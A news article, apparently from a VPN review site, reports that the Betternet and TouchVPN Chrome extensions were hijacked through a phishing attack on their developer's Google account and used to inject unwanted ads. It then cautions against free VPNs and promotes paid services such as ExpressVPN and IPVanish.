An online security company has revealed that two VPN providers were among eight apps which had their Chrome extensions compromised at the end of the June.

According to Proofpoint, both the Betternet and TouchVPN extensions were compromised after their author Google account details were stolen as part of a phishing scam. In reporting the hack, they claim that it “resulted in the hijacking of traffic and exposing users to potentially malicious popups and credential theft.”

Victims of a phishing scam

The discovery was made by a group of Proofpoint researchers known as Kafeine. They found that the extension developer had fallen victim to a pretty basic phishing scam where he was redirected to a fake Google login page which stole his account details when he entered them.

The breach came to light when the developer of the Web Developer for Chrome extension, Chris Pendrick, revealed on Twitter that his extension had been hacked on August 2nd. The Proofpoint researchers downloaded the compromised version of this extension and then isolated the malicious code to discover how it worked.

They concluded that the motivation behind the hack was, as is so often the case, money. All of the Chrome extensions that were hacked had code injected which added unwanted Javascript. This loaded adverts on top of the main programme in an attempt to generate money. The researchers said many of these links were for adult sites, but some users reported seeing official-looking alerts telling them to repair their PC too.

The Proofpoint researchers noted that “Threat actors continue to look for new ways to drive traffic to affiliate programs and effectively surface malicious advertisements to users. In the cases described here, they are leveraging compromised Chrome extensions to hijack traffic and substitute advertisements on victims’ browsers.”

Flooded with adverts

Both Betternet and TouchVPN are free VPN providers and both use adverts as one of their means of generating income for their service. Users are therefore used to seeing some adverts. But in the wake of this hack, multiple users reported Chrome being flooded with adverts

Because it only happened in Chrome, Betternet were able to isolate the issue and repair it quickly. They claim this was done on the same day it was discovered. TouchVPN is thought to have done the same.

As well as the unwanted advertising, the Proofpoint researchers have also warned that some consumers may have had their personal data compromised too, although there is no concrete evidence this has happened to date.

The risks of using a Free VPN

This security breach is not the first time Betternet has been found wanting. As we reported at the beginning of the year, they were one of the free VPN providers which were found to be “riddled with security vulnerabilities, traffic redirects, and other shady practices” by another group of American researchers.

This latest incident is another reminder of the risks associated with free VPNs. The infrastructure behind a VPN is not cheap and VPN providers have to generate income to cover their costs somehow. If they are providing a free service to users, that means they must be generating income in other ways.

These methods can include advertising and like many other online services, they will try to target adverts at their users. This means that they are collecting user data which is a very risky and insecure practice. It also goes against the very reason why most people sign up for a VPN in the first place, but for free VPNs, the need to fund their service has to take priority.

For users who need to bypass online censorship and cannot afford a paid-for VPN, free options like Betternet and TouchVPN serve a purpose. But users should be under no illusion that they are offering the same levels of security and privacy as the reputable VPNs such as ExpressVPN and IPVanish.

Paid-for VPNs only cost a few dollars a month (about the price of a cup of coffee) and for that can offer complete online privacy and security. This is something a free VPN cannot match and something that most don’t want to.